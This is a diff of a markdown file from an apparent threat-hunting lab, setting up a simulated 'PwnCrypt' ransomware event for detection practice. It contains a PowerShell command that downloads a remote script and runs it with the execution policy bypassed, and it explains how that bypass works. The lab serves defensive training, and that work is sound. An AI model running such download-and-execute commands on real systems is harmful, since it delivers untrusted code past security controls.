JordanDanielWest/Zero-Day-Ransomware-PwnCrypt-Outbreak/Zero Day Event Creation.md

-# Threat Event (Suspected Exfiltration of Company Data)
+# Threat Event (Zero Day Ransomware PwnCrypt Outbreak)
 **Use of Powershell to run "Malicious" script**

 ## Steps the "Bad Actor" took Create Logs and IoCs:
 1. Execute the following code in Powershell:
-- `Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/joshmadakor1/lognpacific-public/refs/heads/main/cyber-range/entropy-gorilla/exfiltratedata.ps1' -OutFile 'C:\programdata\exfiltratedata.ps1';cmd /c powershell.exe -ExecutionPolicy Bypass -File C:\programdata\exfiltratedata.ps1`
+- `Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/joshmadakor1/lognpacific-public/refs/heads/main/cyber-range/entropy-gorilla/pwncrypt.ps1' -OutFile 'C:\programdata\pwncrypt.ps1';cmd /c powershell.exe -ExecutionPolicy Bypass -File C:\programdata\pwncrypt.ps1`

 ## What this script does:
-- `exfiltratedata.ps1` is a PowerShell script designed to simulate data exfiltration for cybersecurity training and testing.
-It demonstrates how sensitive files might be collected and transmitted by an attacker.
-Intended for use in controlled environments only.
+-This script performs two main actions:

+    Downloads a PowerShell script:
+    It uses Invoke-WebRequest to retrieve pwncrypt.ps1 from a GitHub URL and saves it to C:\programdata\pwncrypt.ps1.

+    Executes the downloaded script:
+    It then uses cmd to launch PowerShell with execution policy bypassed, running the downloaded pwncrypt.ps1 script.

+This allows the script to run without user confirmation or policy restrictions, simulating how a malicious payload might be delivered and executed during a cyberattack scenario.
 ---

 ## Tables Used to Detect IoCs: